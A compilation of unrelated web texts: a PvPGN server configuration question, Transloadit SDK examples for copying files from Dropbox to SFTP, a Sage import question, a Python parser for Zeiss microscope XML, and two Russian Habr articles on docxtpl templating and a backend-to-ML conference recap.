[debug] trans_net: against entry -> IP_VPS:6112 output IP_VPS:6118 network 0.0.0.0/0x00000000
[debug] trans_net: entry does match input address
[debug] trans_net: against entry -> IP_VPS:6113 output IP_VPS:6113 network 192.168.1.0/0xffffff00
[debug] trans_net: entry does match input address
[debug] trans_net: against entry -> 1IP_VPS:6113 output IP_VPS:6113 network 0.0.0.0/0x00000000
[debug] trans_net: entry does match input address
[debug] trans_net: no match found for IP_PLAYER_1:6112 (not translated)
[debug] _client_gamelistreq: [10] GAMELISTREPLY sent 1 of 1 games
what am I configuring wrong?
NOTE: Remembering that I am in a VPS, I only use the External IP for configuration.
My Settings:
address_translation.conf
# w3route server ip translation
#
# input (ip:port) output (ip:port) exclude (ip/netmask) include (ip/netmask)
#----------------- ------------------ ---------------------- ----------------------
# Example, if you left w3route = 0.0.0.0:6200 as it is by default in bnetd.conf
# AND you have the external IP 1.2.3.4 AND you want to exclude from translation
# the internal W3 clients (those with IPs 192.168.0.x) AND you port forward
# port 6200 TCP from your router to the pvpgn server port 6200 then here put:
0.0.0.0:6200 IP_VPS:6200 192.168.1.0/24 ANY
bnetd.conf
# W3 Play Game router address. Just put your server address in here
# or use 0.0.0.0:6200 for server to bind to all interfaces,
# but make sure you set up w3trans if you do.
w3routeaddr = "0.0.0.0:6200"
tks for help!
|
We are a Swiss Army knife for your files
Transloadit is a service for companies with developers. We handle their file uploads and media processing. This means that they can save on development time and the heavy machinery that is required to handle big volumes in an automated way.
We pioneered with this concept in 2009 and have made our customers happy ever since. We are still actively improving our service in 2021, as well as our open source projects uppy.io and tus.io, which are changing how the world does file uploading.
Copy files from Dropbox to SFTP servers
In this demo we show how you can use Transloadit's API to copy files from Dropbox to SFTP servers.
Once you set up the recipes, Transloadit can do this for you automatically.
Optionally you could also transform the files between the import from Dropbox and the export to SFTP servers.
You can for example encode videos, optimize images, detect faces, and much more.
WarningIt seems your browser does not send the referer, which we need to stop people from (ab)using our demos in other websites. If you want to use the demos, please allow your browser to send its referer to us. Adding us to the whitelist of blockers usually helps.
1. Import files from Dropbox
We are happy to import from whatever storage solution suits you best. Learn more ›
WarningIt seems your browser does not support the codec used in this video of the demo. For demo simplicity we'll link you to the original file, but you may also want to learn how to make videos compatible for all browsers.
2. Export files to SFTP servers
We export to the storage platform of your choice. Learn more ›
Tricky to demo, but in this Step the following files were exported to SFTP servers:
snowflake.jpg
desert.jpg
ravi-roshan-383162.jpg
Once all files have been exported, we can ping a URL of your choice with the Assembly status JSON.
Build this in your own language
{
"imported": {
"robot": "/dropbox/import",
"result": true,
"credentials": "YOUR_DROPBOX_CREDENTIALS",
"path": "my_source_folder/"
},
"exported": {
"robot": "/sftp/store",
"use": "imported",
"result": true,
"credentials": "YOUR_SFTP_CREDENTIALS",
"path": "my_target_folder"
}
}
# Prerequisites: brew install curl jq || sudo apt install curl jq
# To avoid tampering, use Signature Authentication
echo '{
"auth": {
"key": "YOUR_TRANSLOADIT_KEY"
},
"steps": {
"imported": {
"robot": "/dropbox/import",
"result": true,
"credentials": "YOUR_DROPBOX_CREDENTIALS",
"path": "my_source_folder/"
},
"exported": {
"robot": "/sftp/store",
"use": "imported",
"result": true,
"credentials": "YOUR_SFTP_CREDENTIALS",
"path": "my_target_folder"
}
}
}' |curl \
--request POST \
--form 'params=<-' \
--form my_file1=@./ravi-roshan-383162.jpg \
--form my_file2=@./anete-lusina-382336.jpg \
https://api2.transloadit.com/assemblies \
|jq
// Add 'Transloadit' to your Podfile, run 'pod install', add credentials to 'Info.plist'
import Arcane
import TransloaditKit
// Set Encoding Instructions
var AssemblySteps: Array = Array<Step>() // An array to hold the Steps
var Step1 = Step (key: "imported") // Create a Step object
Step1?.setValue("/dropbox/import", forOption: "robot") // Add the details
Step1?.setValue(true, forOption: "result") // Add the details
Step1?.setValue("YOUR_DROPBOX_CREDENTIALS", forOption: "credentials") // Add the details
Step1?.setValue("my_source_folder/", forOption: "path") // Add the details
AssemblySteps.append(Step1) // Add the Step to the array
var Step2 = Step (key: "exported") // Create a Step object
Step2?.setValue("imported", forOption: "use") // Add the details
Step2?.setValue("/sftp/store", forOption: "robot") // Add the details
Step2?.setValue(true, forOption: "result") // Add the details
Step2?.setValue("YOUR_SFTP_CREDENTIALS", forOption: "credentials") // Add the details
Step2?.setValue("my_target_folder", forOption: "path") // Add the details
AssemblySteps.append(Step2) // Add the Step to the array
// We then create an Assembly Object with the Steps and files
var MyAssembly: Assembly = Assembly(steps: AssemblySteps, andNumberOfFiles: 1)
// Add files to upload
MyAssembly.addFile("./ravi-roshan-383162.jpg")
MyAssembly.addFile("./anete-lusina-382336.jpg")
// Start the Assembly
Transloadit.createAssembly(MyAssembly)
// Fires after your Assembly has completed
transloadit.assemblyStatusBlock = {(_ completionDictionary: [AnyHashable: Any]) -> Void in
print("\(completionDictionary.description)")
}
<body>
<form action="/uploads" enctype="multipart/form-data" method="POST">
<input type="file" name="my_file" multiple="multiple" />
</form>
<script src="//ajax.googleapis.com/ajax/libs/jquery/3.2.0/jquery.min.js"></script>
<script src="//assets.transloadit.com/js/jquery.transloadit2-v3-latest.js"></script>
<script type="text/javascript">
$(function() {
$('form').transloadit({
wait: true,
triggerUploadOnFileSelection: true,
params: {
auth: {
// To avoid tampering use signatures:
// https://transloadit.com/docs/api/#authentication
key: 'YOUR_TRANSLOADIT_KEY',
},
// It's often better store encoding instructions in your account
// and use a `template_id` instead of adding these steps inline
steps: {
imported: {
robot: '/dropbox/import',
result: true,
credentials: 'YOUR_DROPBOX_CREDENTIALS',
path: 'my_source_folder/'
},
exported: {
use: 'imported',
robot: '/sftp/store',
result: true,
credentials: 'YOUR_SFTP_CREDENTIALS',
path: 'my_target_folder'
}
}
}
});
});
</script>
</body>
<!-- This pulls Uppy from our CDN. Alternatively use `npm i @uppy/robodog --save` -->
<!-- if you want smaller self-hosted bundles and/or to use modern JavaScript -->
<link href="//releases.transloadit.com/uppy/robodog/v1.6.7/robodog.min.css" rel="stylesheet">
<script src="//releases.transloadit.com/uppy/robodog/v1.6.7/robodog.min.js"></script>
<button id="browse">Select Files</button>
<script>
document.getElementById('browse').addEventListener('click', function () {
var uppy = window.Robodog.pick({
providers: [ 'instagram', 'url', 'webcam', 'dropbox', 'google-drive', 'facebook', 'onedrive' ],
waitForEncoding: true,
params: {
// To avoid tampering, use Signature Authentication
auth: { key: 'YOUR_TRANSLOADIT_KEY' },
// To hide your `steps`, use a `template_id` instead
steps: {
imported: {
robot: '/dropbox/import',
result: true,
credentials: 'YOUR_DROPBOX_CREDENTIALS',
path: 'my_source_folder/'
},
exported: {
use: 'imported',
robot: '/sftp/store',
result: true,
credentials: 'YOUR_SFTP_CREDENTIALS',
path: 'my_target_folder'
}
}
}
}).then(function (bundle) {
// Due to `waitForEncoding: true` this is fired after encoding is done.
// Alternatively, set `waitForEncoding` to `false` and provide a `notify_url`
// for Async Mode where your back-end receives the encoding results
// so that your user can be on their way as soon as the upload completes.
console.log(bundle.transloadit) // Array of Assembly Statuses
console.log(bundle.results) // Array of all encoding results
}).catch(console.error)
})
</script>
// yarn add transloadit || npm i transloadit --save-exact
const Transloadit = require('transloadit')
const transloadit = new Transloadit({
authKey: 'YOUR_TRANSLOADIT_KEY',
authSecret: 'YOUR_TRANSLOADIT_SECRET'
})
// Set Encoding Instructions
const options = {
params: {
steps: {
imported: {
robot: '/dropbox/import',
result: true,
credentials: 'YOUR_DROPBOX_CREDENTIALS',
path: 'my_source_folder/',
},
exported: {
use: 'imported',
robot: '/sftp/store',
result: true,
credentials: 'YOUR_SFTP_CREDENTIALS',
path: 'my_target_folder',
},
}
}
}
// Add files to upload
transloadit.addFile('myfile_1', './ravi-roshan-383162.jpg')
transloadit.addFile('myfile_2', './anete-lusina-382336.jpg')
// Start the Assembly
transloadit.createAssembly(options, (err, result) => {
if (err) {
throw err
}
console.log({result})
})
[sudo] npm install transloadify -g
export TRANSLOADIT_KEY="YOUR_TRANSLOADIT_KEY"
export TRANSLOADIT_SECRET="YOUR_TRANSLOADIT_SECRET"
# Save Encoding Instructions
echo '{
"imported": {
"robot": "/dropbox/import",
"result": true,
"credentials": "YOUR_DROPBOX_CREDENTIALS",
"path": "my_source_folder/"
},
"exported": {
"robot": "/sftp/store",
"use": "imported",
"result": true,
"credentials": "YOUR_SFTP_CREDENTIALS",
"path": "my_target_folder"
}
}' > ./steps.json
transloadify \
--input "./ravi-roshan-383162.jpg" \
--input "./anete-lusina-382336.jpg" \
--output "./output.example" \
--steps "./steps.json"
// composer require transloadit/php-sdk
use transloadit\Transloadit;
$transloadit = new Transloadit([
"key" => "YOUR_TRANSLOADIT_KEY",
"secret" => "YOUR_TRANSLOADIT_SECRET",
]);
// Add files to upload
$files = [];
array_push($files, "./ravi-roshan-383162.jpg")
array_push($files, "./anete-lusina-382336.jpg")
// Start the Assembly
$response = $transloadit->createAssembly([
"files" => $files,
"params" => [
"steps" => [
"imported" => [
"robot" => "/dropbox/import",
"result" => true,
"credentials" => "YOUR_DROPBOX_CREDENTIALS",
"path" => "my_source_folder/",
],
"exported" => [
"use" => "imported",
"robot" => "/sftp/store",
"result" => true,
"credentials" => "YOUR_SFTP_CREDENTIALS",
"path" => "my_target_folder",
],
],
],
]);
# gem install transloadit
transloadit = Transloadit.new(
:key => "YOUR_TRANSLOADIT_KEY",
:secret => "YOUR_TRANSLOADIT_SECRET"
)
# Set Encoding Instructions
imported = transloadit.step "imported", "/dropbox/import",
:result => true,
:credentials => "YOUR_DROPBOX_CREDENTIALS",
:path => "my_source_folder/"
)
exported = transloadit.step "exported", "/sftp/store",
:use => "imported",
:result => true,
:credentials => "YOUR_SFTP_CREDENTIALS",
:path => "my_target_folder"
)
assembly = transloadit.assembly(
:steps => [ imported, exported ]
)
# Add files to upload
files = []
files.push("./ravi-roshan-383162.jpg")
files.push("./anete-lusina-382336.jpg")
# Start the Assembly
response = assembly.create! *files
until response.finished?
sleep 1; response.reload!
end
if !response.error?
# handle success
end
# pip install pytransloadit
from transloadit import client
tl = client.Transloadit('YOUR_TRANSLOADIT_KEY', 'YOUR_TRANSLOADIT_SECRET')
assembly = tl.new_assembly()
# Set Encoding Instructions
assembly.add_step('imported', {
'robot': '/dropbox/import',
'result': true,
'credentials': 'YOUR_DROPBOX_CREDENTIALS',
'path': 'my_source_folder/'
})
assembly.add_step('exported', {
'use': 'imported',
'robot': '/sftp/store',
'result': true,
'credentials': 'YOUR_SFTP_CREDENTIALS',
'path': 'my_target_folder'
})
# Add files to upload
assembly.add_file(open('./ravi-roshan-383162.jpg', 'rb'))
assembly.add_file(open('./anete-lusina-382336.jpg', 'rb'))
# Start the Assembly
assembly_response = assembly.create(retries=5, wait=True)
print assembly_response.data.get('assembly_id')
# or
print assembly_response.data['assembly_id']
// go get gopkg.in/transloadit/go-sdk.v1
package main
import (
"fmt"
"gopkg.in/transloadit/go-sdk.v1"
)
options := transloadit.DefaultConfig
options.AuthKey = "YOUR_TRANSLOADIT_KEY"
options.AuthSecret = "YOUR_TRANSLOADIT_SECRET"
client := transloadit.NewClient(options)
// Initialize new Assembly
assembly := transloadit.NewAssembly()
// Set Encoding Instructions
assembly.AddStep("imported", map[string]interface{}{
"robot": "/dropbox/import",
"result": true,
"credentials": "YOUR_DROPBOX_CREDENTIALS",
"path": "my_source_folder/"
})
assembly.AddStep("exported", map[string]interface{}{
"use": "imported",
"robot": "/sftp/store",
"result": true,
"credentials": "YOUR_SFTP_CREDENTIALS",
"path": "my_target_folder"
})
// Add files to upload
assembly.AddFile("myfile_1", "./ravi-roshan-383162.jpg")
assembly.AddFile("myfile_2", "./anete-lusina-382336.jpg")
// Start the Assembly
info, err := client.StartAssembly(context.Background(), assembly)
if err != nil {
panic(err)
}
// All files have now been uploaded and the Assembly has started but no
// results are available yet since the conversion has not finished.
// WaitForAssembly provides functionality for polling until the Assembly
// has ended.
info, err = client.WaitForAssembly(context.Background(), info)
if err != nil {
panic(err)
}
fmt.Printf("You can check some results at: \n")
fmt.Printf(" - %s\n", info.Results["imported"][0].SSLURL)
fmt.Printf(" - %s\n", info.Results["exported"][0].SSLURL)
// compile 'com.transloadit.sdk:transloadit:0.1.5'
import com.transloadit.sdk.Assembly;
import com.transloadit.sdk.Transloadit;
import com.transloadit.sdk.exceptions.LocalOperationException;
import com.transloadit.sdk.exceptions.RequestException;
import com.transloadit.sdk.response.AssemblyResponse;
import java.io.File;
import java.util.HashMap;
import java.util.Map;
public class Main {
public static void main(String[] args) {
Transloadit transloadit = new Transloadit("YOUR_TRANSLOADIT_KEY", "YOUR_TRANSLOADIT_SECRET");
Assembly assembly = transloadit.newAssembly();
// Set Encoding Instructions
Map<String Object> importedStepOptions = new HashMap();
importedStepOptions.put("result", true);
importedStepOptions.put("credentials", "YOUR_DROPBOX_CREDENTIALS");
importedStepOptions.put("path", "my_source_folder/");
assembly.addStep("imported", "/dropbox/import", importedStepOptions);
Map<String Object> exportedStepOptions = new HashMap();
exportedStepOptions.put("use", "imported");
exportedStepOptions.put("result", true);
exportedStepOptions.put("credentials", "YOUR_SFTP_CREDENTIALS");
exportedStepOptions.put("path", "my_target_folder");
assembly.addStep("exported", "/sftp/store", exportedStepOptions);
// Add files to upload
assembly.addFile(new File("./ravi-roshan-383162.jpg"));
assembly.addFile(new File("./anete-lusina-382336.jpg"));
// Start the Assembly
try {
AssemblyResponse response = assembly.save();
// Wait for Assembly to finish executing
while (!response.isFinished()) {
response = transloadit.getAssemblyByUrl(response.getSslUrl());
}
System.out.println(response.getId());
System.out.println(response.getUrl());
System.out.println(response.json());
} catch (RequestException | LocalOperationException e) {
// Handle exception here
}
}
}
So many ways to integrate
Bulk imports
Add one of our import Robots to acquire and transcode massive media libraries.
Handling uploads
Front-end integration
We integrate with web browsers via our next-gen file uploader Uppy and SDKs for Android and iOS.
Back-end integration
Pingbacks
Configure anotify_urlto let your server receive transcoding results JSON in thetransloaditPOST field.
|
import sage packages in python
An easy way to use sage in python files is demonstrated in the Sage Tutorial.
#!/usr/bin/env sage -python
import sys
from sage.all import *
if len(sys.argv) != 2:
print "Usage: %s <n>"%sys.argv[0]
print "Outputs the prime factorization of n."
sys.exit(1)
print factor(sage_eval(sys.argv[1]))
Well, what if I don't want to import all of sage as shown above using:
from sage.all import *
Instead of this command above, I just want to import the following:
Matrix -> type 'sage.matrix.matrix_integer_dense.Matrix_integer_dense'
vector -> type 'sage.modules.vector_integer_dense.Vector_integer_dense'
ZZ -> type 'sage.rings.integer_ring.IntegerRing_class'
MixedIntegerLinearProgram -> type 'sage.numerical.mip.MixedIntegerLinearProgram'
So I should be able to write something like this in python
from sage.library.package.for.Matrix import *
from sage.library.package.for.vector import *
from sage.library.package.for.ZZ import *
from sage.library.package.for.MixedIntegerLinearProgram import *
I just don't know what they are. Any help is appreciated.
Thanks.
|
NewerOlder
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
GEPARD - Gepard-Enabled PARticle Detection
Copyright (C) 2018 Lars Bittrich and Josef Brandt, Leibniz-Institut für
Polymerforschung Dresden e. V. <[email protected]>
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program, see COPYING.
If not, see <https://www.gnu.org/licenses/>.
"""
from xml.sax import make_parser, handler
class Marker:
def __init__(self, name, x, y, z):
self.name, self.x, self.y, self.z = name, x, y, z
def getPos(self):
return self.x, self.y, self.z
def __repr__(self):
return str(self)
def __str__(self):
return f'Marker: "{self.name}" at: {self.getPos()} µm'
class Region:
def __init__(self):
self.centerx, self.centery = None, None
self.width, self.height = None, None
def __repr__(self):
return str(self)
def __str__(self):
return f'Region center: {self.centerx, self.centery} µm\n' + \
f'Region size: {self.width, self.height} µm'
class ZRange:
def __init__(self):
self.z0, self.zn = None, None
self.dz = None
def __repr__(self):
return str(self)
def __str__(self):
return f'Z-range in: {self.z0, self.zn} µm at step size: {self.dz} µm'
class ZeissHandler(handler.ContentHandler):
def __init__(self):
self.markers = []
self.region = Region()
self.zrange = ZRange()
self.intag = False
self.subtag = ''
def characters(self, content):
if self.intag:
self.content += content.strip()
def startElement(self, name, attrs):
if name == 'Marker':
self.markers.append(Marker(attrs['Id'], attrs['StageXPosition'],
attrs['StageYPosition'],
attrs['FocusPosition']))
elif name == 'TileRegion' or name == 'ZStackSetup':
self.intag = True
if self.intag:
self.content = ''
if name in ['First','Last','Interval']:
self.subtag = name
def endElement(self, name):
if name == 'TileRegion' or name == 'ZStackSetup':
self.intag = False
if self.intag and name == 'CenterPosition':
self.region.centerx, self.region.centery = map(float, self.content.split(','))
elif self.intag and name == 'ContourSize':
self.region.width, self.region.height = map(float, self.content.split(','))
elif self.intag and name == 'Value' and \
self.subtag in ['First','Last','Interval']:
attrmap = {'First':'z0','Last':'zn','Interval':'dz'}
# values a given in meter even though µm are set as units?
# -> we convert to µm
self.zrange.__setattr__(attrmap[self.subtag],
float(self.content)*1.0e6)
self.subtag = ''
|
Заполняем документы в Microsoft Word при помощи Python. Часть 1
Исполняем обязанности по получению сведений о своих бенефициарных владельцах
Небольшая вводная
Начиная с 21 декабря 2016 года вступили изменения в ФЗ РФ «О противодействии легализации (отмыванию) доходов, полученных преступным путем, и финансированию терроризма», касательно обязанности юридического лица по раскрытию информации о своих бенефициарных владельцах. В связи с этим, многие компании направляют запросы по цепочке владения с целью выяснения своих бенефициарных владельцев. Кто-то формирует запросы на бумаге, кто-то рассылает электронные письма.
На наш взгляд, надлежащим доказательством исполнения обязанности «знай своего бенефициарного владельца» является наличие письма на бумаге с отметкой об отправке/вручении. Данные письма в идеале должны готовиться не реже одного раза в год. Если в ведении юриста находится всего несколько компаний, то составление писем не составляет особого труда. Но, если компаний больше 3-х десятков, составление писем превращается в уничтожающую позитив рутину. Дело усугубляется тем, что реквизиты писем постоянно меняются: подписанты увольняются, компании перерегистрируются, меняя адреса. Все это надо учитывать. Как здесь могут помочь навыки программирования на python?
Очень просто — хорошо бы иметь программу, которая сама будет подставлять в письма необходимые реквизиты. В том числе формировать сами письма, не заставляя создавать документ за документом вручную. Попробуем.
Структура письма в word. Модуль python docxtpl
Перед написанием кода программы посмотрим как должен выглядеть шаблон письма, в который мы будем помещать наши данные.
Текст письма от общества своему участнику/акционеру будет примерно следующим:
Напишем простую программу, которая заполнит для начала одно поле в нашем шаблоне, чтобы понять принцип работы.
Для начала в самом шаблоне письма Word вместо одного из полей, например, подписанта поставим переменную. Данная переменная должна быть на либо на англ. языке, либо на русском, но в одно слово.Также переменная должна быть обязательно заключена в двойные фигурные скобки. Выглядеть это будет примерно так:
Сама программа будет иметь следующий вид:
from docxtpl import DocxTemplate
doc = DocxTemplate("шаблон.docx")
context = { 'director' : "И.И.Иванов"}
doc.render(context)
doc.save("шаблон-final.docx")
Вначале мы импортируем модуль для работы с документами формата Word. Далее мы открываем шаблон, и в поле директор, которое бы обозначили ранее в самом шаблоне, вносим ФИО директора. В конце документ сохраняется под новым именем.
Таким образом, чтобы заполнить все поля в файле-шаблоне Word нам для начала необходимо определить все поля ввода в самом шаблоне скобками {} вместе с переменными и потом написать программу. Код будет примерно следующим:
from docxtpl import DocxTemplate
doc = DocxTemplate("шаблон.docx")
context = { 'emitent' : 'ООО Ромашка', 'address1' : 'г. Москва, ул. Долгоруковская, д. 0', 'участник': 'ООО Участник', 'адрес_участника': 'г. Москва, ул. Полевая, д. 0', 'director': 'И.И. Иванов'}
doc.render(context)
doc.save("шаблон-final.docx")
На выходе при исполнении программы мы получим готовый заполненный документ.
Скачать готовый шаблон Word можно здесь.
|
Конференция Хабра — история не дебютная. Раньше мы проводили довольно крупные мероприятия Тостер на 300-400 человек, а сейчас решили, что актуальными будут небольшие тематические встречи, направление которых можете задавать и вы — например, в комментариях. Первая конференция такого формата прошла в июле и была посвящена бэкенд-разработке. Участники слушали доклады об особенностях перехода из бэкенда в ML и об устройстве сервиса «Квадрюпель» на портале «Госуслуги», а также приняли участие в круглом столе, посвященном Serverless. Тем, кто не смог посетить мероприятие лично, в этом посте мы рассказываем самое интересное.
Из бэкенд-разработки в машинное обучение
Чем занимаются дата-инженеры в ML? Чем сходны и чем отличаются задачи бэкенд-разработчика и ML-инженера? Какой путь нужно пройти, чтобы сменить первую профессию на вторую? Об этом рассказал Александр Паринов, который ушел в машинное обучение после 10 лет бэкенда.
Александр Паринов
Сегодня Александр работает архитектором систем компьютерного зрения в X5 Retail Group и контрибьютит в Open Source проекты, связанные с компьютерным зрением и глубоким обучением (github.com/creafz). Его скилы подтверждает участие в топ-100 мирового рейтинга Kaggle Master (kaggle.com/creafz) — самой популярной платформы, проводящей соревнования по машинному обучению.
Зачем переходить на машинное обучение
Полтора года назад Джефф Дин, главы Google Brain — проекта Google по исследованию искусственного интеллекта на основе глубокого обучения — рассказал, как полмиллиона строк кода в Google Translate заменили нейронной сетью на Tensor Flow, состоящей всего из 500 строк. После обучения сети качество данных выросло, а инфраструктура упростилась. Казалось бы, вот наше светлое будущее: больше не придется писать код, достаточно делать нейронки и закидывать их данными. Но на практике все гораздо сложнее.
ML-инфраструктура в Google
Нейронные сети – это лишь небольшая часть инфраструктуры (маленький черный квадратик на картинке выше). Требуется еще много вспомогательных систем, чтобы получать данные, обрабатывать их, хранить, проверять качество и т. д., нужна инфраструктура для обучения, развертывания кода машинного обучения в продакшене, тестирования этого кода. Все эти задачи как раз похожи на то, чем занимаются бэкенд-разработчики.
Процесс машинного обучения
Чем отличается ML от бэкенда
В классическом программировании мы пишем код, и это диктует поведение программы. В ML у нас есть небольшой код модели и много данных, которыми мы закидываем модель. Данные в ML очень важны: одна и та же модель, обученная разными данными, может показывать совершенно разные результаты. Проблема заключается в том, что почти всегда данные разрозненны и лежат в разных системах (реляционные базы данных, NoSQL-базы, логи, файлы).
Версионирование данных
ML требует версионирования не только кода, как в классической разработке, но и данных: необходимо четко понимать, на чем обучалась модель. Для этого можно пользоваться популярной библиотекой Data Science Version Control (dvc.org).
Разметка данных
Следующая задача — разметка данных. Например, отметить все предметы на картинке или сказать, к какому классу она принадлежит. Этим занимаются специальные сервисы наподобие «Яндекс.Толоки», работу с которыми сильно упрощает наличие API. Сложности возникают из-за «человеческого фактора»: повысить качество данных и свести ошибки к минимуму можно, поручая одно и то же задание нескольким исполнителям.
Визуализация в Tensor Board
Логирование экспериментов необходимо для сравнения результатов, выбора лучшей по каким-то метрикам модели. Для визуализации есть большой набор средств – например, Tensor Board. Но для хранения экспериментов каких-то идеальных способов нет. В маленьких компаниях зачастую обходятся excel-табличкой, в крупных используют специальные платформы для хранения результатов в БД.
Платформ для машинного обучения множество, но ни одна из них не закрывает и 70% потребностей
Первая проблема, с которой приходится сталкиваться при выводе обученной модели в продакшн, связана с любимым инструментом дата-сайентистов — Jupyter Notebook. В нем нет модулярности, то есть на выходе получается такая «портянка» кода, не разбитого на логические куски – модули. Все перемешано: классы, функции, конфигурации и т. д. Этот код трудно версионировать и тестировать.
Как с этим бороться? Можно смириться, как Netflix, и создать свою платформу, позволяющую прямо в продакшене запускать эти ноутбуки, передавать им на вход данные и получать результат. Можно заставить разработчиков, которые катят модель в продакшн, переписать код нормально, разбить на модули. Но при таком подходе легко ошибиться, и модель будет работать не так, как задумывалось. Поэтому идеальный вариант – запретить использовать Jupyter Notebook для кода моделей. Если, разумеется, дата-сайентисты на это согласятся.
Модель как черный ящик
Самый простой способ вывести модель в продакшн – использовать ее как черный ящик. У вас есть какой-то класс модели, вам передали веса модели (параметры нейронов обученной сети), и если вы этот класс инициализируете (вызовите метод predict, подадите на него картинку), то на выходе получите некое предсказание. Что происходит внутри – не имеет значения.
Отдельный процесс-сервер с моделью
Можно также поднять некий отдельный процесс и засылать его через очередь RPC (с картинками или другими исходными данными. На выходе мы будем получать предикты.
Пример использования модели во Flask:
@app.route("/predict", methods=["POST"])
def predict():
image = flask.request.files["image"].read()
image = preprocess_image(image)
predictions = model.predict(image)
return jsonify_prediction(predictions)
Проблема такого подхода — ограничение производительности. Допустим, у нас есть код на Phyton, написанный дата-сайентистами, который тормозит, а мы хотим выжать максимальную производительность. Для этого можно использовать инструменты, которые преобразовывают код в нативный или конвертируют его в другой фреймворк, заточенный под продакшн. Такие инструменты есть для каждого фреймворка, но идеальных не существует, придется допиливать самостоятельно.
Инфраструктура в ML такая же, как в обычном бэкенде. Есть Docker и Kubernetes, только для Docker нужно поставить рантайм от NVIDIA, который позволяет процессам внутри контейнера получить доступ к видеокартам в хосте. Для Kubernetes нужен плагин, чтобы он мог менеджить серверы с видеокартами.
В отличие от классического программирования, в случае с ML в инфраструктуре появляется много разных подвижных элементов, которые нужно проверять и тестировать — например, код обработки данных, пайплайн обучения модели и продакшн (см. схему выше). Важно протестировать код, связывающий разные куски пайплайнов: кусков много, и проблемы очень часто возникают на границах модулей.
Как работает AutoML
Сервисы AutoML обещают подобрать оптимальную для ваших целей модель и обучить ее. Но нужно понимать: в ML очень важны данные, результат зависит от их подготовки. Разметкой занимаются люди, что чревато ошибками. Без жесткого контроля может получиться мусор, а автоматизировать процесс пока не выходит, нужна проверка со стороны специалистов — дата-сайентистов. Вот на этом месте и «ломается» AutoML. Но он может быть полезен для подбора архитектуры – когда вы уже подготовили данные и хотите провести серию экспериментов для поиска лучшей модели.
Как попасть в машинное обучение
Попасть в ML проще всего, если вы разрабатываете на Python, который используется во всех фреймворках для глубокого обучения (и обычных фреймворках). Этот язык практически обязателен для данной сферы деятельности. С++ применяется для некоторых задач с компьютерным зрением — например, в системах управления беспилотными автомобилями. JavaScript и Shell — для визуализации и таких странных вещей, как запуск нейронки в браузере. Java и Scala используется при работе с Big Data и для машинного обучения. R и Julia любят люди, которые занимаются матстатистикой.
Получать практический опыт для начала удобнее всего на Kaggle, участие в одном из конкурсов платформы дает больше, чем год изучения теории. На этой платформе вы можете взять чей-то выложенный и прокомментированный код и попытаться его улучшить, оптимизировать под свои цели. Бонус — ранг на Kaggle влияет на вашу зарплату.
Другой вариант — пойти бэкенд-разработчиком в ML-команду. Сейчас много стартапов, занимающихся машинным обучением, в которых вы наберетесь опыта, помогая коллегам в решении их задач. Наконец, можно вступить в одно из сообществ дата-сайентистов — Open Data Science (ods.ai) и другие.
Дополнительную информацию по теме докладчик разместил по ссылке https://bit.ly/backend-to-ml
«Квадрюпель» — сервис таргетированных уведомлений портала «Госуслуги»
Евгений Смирнов
Следующим выступал начальник отдела разработки инфраструктуры электронного правительства Евгений Смирнов, который рассказал о «Квадрюпеле». Это сервис таргетированных уведомлений портала «Госуслуги» (gosuslugi.ru) — самого посещаемого государственного ресурса Рунета. Дневная аудитория составляет 2,6 млн, всего же на сайте зарегистрировано 90 млн пользователей, из них 60 млн — подтвержденные. Нагрузка на API портала — 30 тыс. RPS.
Технологии, которые используются в бэкенде «Госуслуг»
«Квадрюпель» — сервис адресного оповещения, с помощью которого пользователь получает предложение об услуге в наиболее подходящий для него момент путем настройки специальных правил информирования. Основными требованиями при разработке сервиса были гибкие настройки и адекватное время на рассылки.
Как работает Квадрюпель
На схеме выше показано одно из правил работы «Квадрюпеля» на примере ситуации с необходимостью замены водительских прав. Сначала сервис ищет пользователей, у которых срок годности кончается через месяц. Им выставляется баннер с предложением получить соответствующую услугу и отправляется сообщение на электронную почту. Для тех пользователей, у которых срок уже истек, баннер и email меняются. После успешного обмена прав пользователь получает другие уведомления — с предложением обновить данные в удостоверении.
С технической точки зрения это groovy-скрипты, в которых написан код. На входе — данные, на выходе — true/false, совпало/не совпало. Всего более 50 правил – от определения дня рождения пользователя (текущая дата равна дате рождения пользователя) до сложных ситуаций. Ежедневно по этим правилам определяется около миллиона совпадений — людей, которых нужно оповестить.
Каналы уведомлений «Квадрюпеля»
Под капотом «Квадрюпеля» находится БД, в которой хранятся данные пользователей, и три приложения:
Workerпредназначен для обновления данных.
Rest APIзабирает и отдает на портал и на мобильное приложение сами баннеры.
Schedulerзапускает работы по пересчету баннеров или массовой рассылки.
Для обновления данных бэкенд событийно ориентирован. Два интерфейса — рест или JMS. Событий много, перед сохранением и обработкой они агрегируются, чтобы не делать лишних запросов. Сама БД, табличка, в которой хранятся данные, выглядит как key value хранилище – ключ пользователя и само значение: флажки, обозначающие наличие или отсутствие соответствующих документов, их срок действия, агрегированная статистика по заказу услуг этим пользователем и прочее.
После сохранения данных ставится задача в JMS, чтобы немедленно пересчитались баннеры – это нужно сразу отображать на вебе. Система запускается по ночам: в JMS накидываются задачи с интервалами пользователей, по которым надо пересчитать правила. Это подхватывают обработчики, занятые пересчетом. Далее результаты обработки попадают в следующую очередь, которая либо сохраняет баннеры в БД, либо отправляет в сервис задачи на нотификацию пользователя. Процесс занимает 5-7 часов, он легко масштабируется за счет того, что можно всегда либо докинуть обработчиков, либо поднять инстансы с новыми обработчиками.
Сервис работает достаточно хорошо. Но объем данных растет, поскольку пользователей становится больше. Это приводит к увеличению нагрузки на базу — даже с учетом того, что Rest API смотрит в реплику. Второй момент — JMS, который, как выяснилось, не очень подходит из-за большого потребления памяти. Высок риск переполнения очереди с падением JMS и остановкой обработки. Поднять JMS после этого без очистки логов невозможно.
